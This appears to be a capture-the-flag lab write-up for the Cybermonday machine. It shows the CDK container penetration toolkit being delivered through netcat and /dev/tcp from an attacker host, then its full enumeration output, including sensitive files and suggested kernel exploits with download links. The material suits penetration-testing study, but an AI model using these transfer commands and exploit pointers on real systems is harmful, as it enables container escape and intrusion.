InfoSec LAB

Cybermonday_Automated_Docker

Created: 5 min read

CDK - Zero Dependency Container Penetration Toolkit

Running CDK after performing some basic enumeration

cdk is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ nc -lvp 2222 < /home/kali/Tools/CDK/cdk
listening on [any] 2222 ...
connect to [10.10.14.12] from cybermonday.htb [10.10.11.228] 57752
 
www-data@070370e2cdc4:/tmp$ cat < /dev/tcp/10.10.14.12/2222 > cdk
www-data@070370e2cdc4:/tmp$ chmod 755 ./cdk

Delivery complete

www-data@070370e2cdc4:/tmp$ ./cdk evaluate --full
CDK (Container DucK)
cdk version(gitcommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2023/08/22 17:12:59 current dir: /tmp
2023/08/22 17:12:59 current user: www-data uid: 33 gid: 33 home: /var/www
2023/08/22 17:12:59 hostname: 070370e2cdc4
2023/08/22 17:12:59 debian debian 12.0 kernel: 5.10.0-24-amd64
2023/08/22 17:12:59 Setuid files found:
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/mount
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/su
	/usr/bin/umount
	/bin/chfn
	/bin/chsh
	/bin/gpasswd
	/bin/mount
	/bin/newgrp
	/bin/passwd
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
2023/08/22 17:12:59 service found in process:
	1	0	php-fpm
2023/08/22 17:12:59 service found in process:
	8	1	php-fpm
2023/08/22 17:12:59 service found in process:
	9	1	php-fpm
 
[  Information Gathering - Commands and Capabilities  ]
2023/08/22 17:12:59 available commands:
	curl,find,php,apt,dpkg,ssh,git,mount,gcc,g++,make,base64,perl
2023/08/22 17:12:59 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	capinh:	00000000a80425fb
	capprm:	0000000000000000
	capeff:	0000000000000000
	capbnd:	00000000a80425fb
	capamb:	0000000000000000
	cap decode: 0x0000000000000000 = 
[*] maybe you can exploit the capabilities below:
 
[  Information Gathering - Mounts  ]
0:38 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/4MBBNRGLE4F45RTUNEB4X3CNLS:/var/lib/docker/overlay2/l/HTJYO7BU2CUGS5DOBGIBELEFWP:/var/lib/docker/overlay2/l/GJQLOEAZV7TJMTKOEBMYV3MIMS:/var/lib/docker/overlay2/l/UMKIFSREWPFIRHVIJUPWZLO3XA:/var/lib/docker/overlay2/l/HLG4K26HZIYJ2JHVYIUI37EXKF:/var/lib/docker/overlay2/l/ILDR2EVZM3SLF27Z3VOX547NGL:/var/lib/docker/overlay2/l/DV2PAKLBPPAU4UBREFFEAEMN7J:/var/lib/docker/overlay2/l/XRZZIGO2I7XS2SXUZKQREDMGJM:/var/lib/docker/overlay2/l/JDHNZ6S6FTRGW22NMXKTKVYHGA:/var/lib/docker/overlay2/l/4UC6ZQDL4NUOHIMCOFIDHXLM4K:/var/lib/docker/overlay2/l/RCNKSVWBNVG7FMCTNF54JVW3OM:/var/lib/docker/overlay2/l/YKPNHAK6OQQ2F7M35KIL6ZEUES:/var/lib/docker/overlay2/l/I2E6NH6IY5Z5F2I47VMRM4OWZB:/var/lib/docker/overlay2/l/R7JEYQHDDWV4R3NHTAPX66ARV4:/var/lib/docker/overlay2/l/KWYCLHLPMY4D3S53KE74CTK52F:/var/lib/docker/overlay2/l/3F5JJZRDPWSPWFSWGYDUISX3A7:/var/lib/docker/overlay2/l/4ELQTLN4QWDXF33AEKIXTC5BFF,upperdir=/var/lib/docker/overlay2/8c5adf8369c63924fdfed69941b1f93b507ffd40ae5cb7b116963bbc3934c3bd/diff,workdir=/var/lib/docker/overlay2/8c5adf8369c63924fdfed69941b1f93b507ffd40ae5cb7b116963bbc3934c3bd/work
0:73 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:74 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:75 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:76 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:26 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:72 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
8:1 /home/john /mnt ro,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
8:1 /var/lib/docker/containers/070370e2cdc4a146383b5775f4e3956d88d0f7b95630643959250bccc48501f3/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
0:54 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:73 /bus /proc/bus ro,relatime - proc proc rw
0:73 /fs /proc/fs ro,relatime - proc proc rw
0:73 /irq /proc/irq ro,relatime - proc proc rw
0:73 /sys /proc/sys ro,relatime - proc proc rw
0:73 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:102 / /proc/asound ro,relatime - tmpfs tmpfs ro
0:103 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:74 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:104 / /sys/firmware ro,relatime - tmpfs tmpfs ro
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2023/08/22 17:12:59 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coredns: lookup any.any.svc.cluster.local. on 127.0.0.11:53: read udp 127.0.0.1:55321->127.0.0.11:53: i/o timeout
error when requesting coredns: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: read udp 127.0.0.1:56923->127.0.0.11:53: i/o timeout
 
[  Discovery - K8s API Server  ]
2023/08/22 17:13:19 checking if api-server allows system:anonymous request.
err found while searching local k8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load k8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2023/08/22 17:13:20 failed to dial Alibaba Cloud API.
2023/08/22 17:13:21 failed to dial Azure API.
2023/08/22 17:13:22 failed to dial Google Cloud API.
2023/08/22 17:13:23 failed to dial Tencent Cloud API.
2023/08/22 17:13:24 failed to dial OpenStack API.
2023/08/22 17:13:25 failed to dial Amazon Web Services (AWS) API.
2023/08/22 17:13:26 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2023/08/22 17:13:26 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
 
   details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   exposure: probable
   tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   download url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
 
[+] [CVE-2022-0847] DirtyPipe
 
   details: https://dirtypipe.cm4all.com/
   exposure: less probable
   tags: ubuntu=(20.04|21.04),debian=11
   download url: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-27365] linux-iscsi
 
   details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   exposure: less probable
   tags: RHEL=8
   download url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   exposure: less probable
   tags: ubuntu=20.04{kernel:5.8.0-*}
   download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   comments: ip_tables kernel module must be loaded
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bashrc - /etc/skel/.bashrc
	/.bash_history - /mnt/.bash_history
	/.bashrc - /mnt/.bashrc
	/.ssh/ - /mnt/.ssh/authorized_keys
	.git/ - /var/www/html/.git/COMMIT_EDITMSG
	.git/ - /var/www/html/.git/HEAD
	.git/ - /var/www/html/.git/branches
	.git/ - /var/www/html/.git/config
	.git/ - /var/www/html/.git/description
	.git/ - /var/www/html/.git/hooks
	.git/ - /var/www/html/.git/index
	.git/ - /var/www/html/.git/info
	.git/ - /var/www/html/.git/logs
	.git/ - /var/www/html/.git/objects
	.git/ - /var/www/html/.git/refs
 
[  Information Gathering - ASLR  ]
2023/08/22 17:13:30 /proc/sys/kernel/randomize_va_space file content: 2
2023/08/22 17:13:30 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2023/08/22 17:13:30 /proc/1/cgroup file content:
	0::/
2023/08/22 17:13:30 /proc/self/cgroup file added content (compare pid 1) :

Nothing found

Interactive Graph View

Backlinks